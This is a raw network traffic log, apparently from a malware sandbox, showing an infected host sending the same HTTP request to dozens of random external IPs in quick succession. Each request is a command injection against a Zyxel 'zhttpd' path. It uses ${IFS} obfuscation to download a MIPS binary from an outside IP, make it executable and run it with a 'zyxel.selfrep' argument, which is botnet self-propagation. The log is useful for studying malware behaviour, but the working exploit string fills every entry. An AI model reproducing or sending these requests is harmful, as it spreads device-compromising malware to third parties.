                                      Jan 19, 2024 17:29:34.814544916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4867192.168.2.144430479.244.129.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814572096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4868192.168.2.1453238105.45.191.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814640999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4869192.168.2.145164236.54.42.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814666033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4870192.168.2.1442460161.216.152.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814722061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4871192.168.2.1449042188.109.177.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814737082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4872192.168.2.1434874106.194.244.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814795971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4873192.168.2.1448824141.252.95.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814830065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4874192.168.2.144376247.31.27.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814884901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4875192.168.2.1444988201.83.196.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814904928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4876192.168.2.144671282.30.216.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814950943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4877192.168.2.1438442145.36.76.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815006018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4878192.168.2.1456182174.118.40.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815035105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4879192.168.2.143863632.226.243.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815087080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4880192.168.2.143435853.85.182.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815105915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4881192.168.2.143562418.187.60.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815141916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4882192.168.2.1459560176.189.108.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815161943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4883192.168.2.144835864.201.200.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815202951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4884192.168.2.144527447.39.20.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815251112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4885192.168.2.1435370163.34.40.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815291882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4886192.168.2.1438034159.27.72.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815319061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4887192.168.2.1449254104.0.61.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815352917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4888192.168.2.1448768171.84.181.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815373898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4889192.168.2.143282499.53.89.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815408945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4890192.168.2.145587846.19.150.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815435886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4891192.168.2.1441778177.13.249.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815484047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4892192.168.2.145411044.3.202.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815505028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4893192.168.2.144791638.219.163.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815576077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4894192.168.2.145263065.62.213.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815598965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4895192.168.2.1439954102.218.99.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815634012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4896192.168.2.145967259.132.104.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815690041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4897192.168.2.145839041.48.52.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815735102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4898192.168.2.145523292.22.156.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815773010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4899192.168.2.1454934126.7.14.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815809965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4900192.168.2.1439758216.250.235.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815834045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4901192.168.2.145250250.173.74.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815871954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4902192.168.2.144132860.32.18.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815917969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4903192.168.2.1442178207.18.27.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815946102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4904192.168.2.1445784198.206.2.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.815984011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4905192.168.2.145484048.7.240.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816008091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4906192.168.2.1433384142.255.200.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816036940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4907192.168.2.145960241.182.111.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816112041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4908192.168.2.1434090102.154.248.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816159010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4909192.168.2.1452750116.27.247.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816190004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4910192.168.2.1460040110.82.46.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816211939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4911192.168.2.1455716149.7.210.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816258907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4912192.168.2.143923685.35.185.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816281080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4913192.168.2.1455106100.4.240.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816322088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4914192.168.2.143818861.28.109.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816380024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4915192.168.2.1452438104.227.83.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816433907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4916192.168.2.144970666.133.194.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816452980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4917192.168.2.1455556104.165.170.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816493034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4918192.168.2.145288435.124.174.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816534042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4919192.168.2.1439584200.58.85.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816556931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4920192.168.2.1439422198.156.213.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816612959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4921192.168.2.1453294176.19.248.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816643000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4922192.168.2.1437624156.105.16.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816684008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4923192.168.2.1460900128.141.183.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816728115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4924192.168.2.1459518218.216.217.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816776037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4925192.168.2.144999891.251.10.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816826105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4926192.168.2.1460052182.71.106.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816840887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4927192.168.2.1440890143.122.147.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816888094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4928192.168.2.1448980125.136.145.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816922903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4929192.168.2.1448876213.168.59.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.816956997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4930192.168.2.1440178118.62.32.247443
                                      TimestampBytes transferredDirectionData
